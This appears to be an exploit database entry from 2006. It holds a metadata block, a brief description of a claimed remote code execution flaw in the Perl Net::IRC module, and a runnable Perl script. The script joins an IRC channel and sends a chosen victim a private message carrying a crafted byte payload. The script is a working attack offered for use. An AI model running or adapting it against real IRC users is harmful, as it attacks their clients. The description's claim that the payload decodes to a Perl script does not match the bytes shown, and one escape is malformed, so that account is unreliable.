Remote Code Execution Vulnerability in Net::IRC

vendor:

Net::IRC

by:

milw0rm.com

9,3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Net::IRC

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Remote Code Execution Vulnerability in Net::IRC

Net::IRC is a Perl module for creating IRC clients. A vulnerability exists in the way it handles user input, allowing an attacker to execute arbitrary code on the vulnerable system. The exploit code takes advantage of this vulnerability by sending a malicious payload to the victim's IRC client. The payload is a string of hexadecimal characters that, when decoded, contains a malicious Perl script.

Mitigation:

Upgrade to the latest version of Net::IRC.

Source

Exploit-DB raw data:

#!/usr/bin/perl

# rewritten because perl is more elegant than php
# payload taken from original that ratboy submitted

use strict;
use Net::IRC;

my ($nick, $server, $port, $channel, $victim) = @ARGV;

my $irc = new Net::IRC;
my $connect = $irc -> newconn (Nick => "$nick",
Server => "$server",
Port => $port,
Ircname=> 'whatever')
or die "$0: Error\n";

my $payload = "\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82";        

sub on_connect {
	my $self = shift;
	
	$self->join("#".$channel);
	$self->privmsg($victim, "$payload");
}

$connect->add_handler('376', \&on_connect);
$irc->start();

# milw0rm.com [2006-08-08]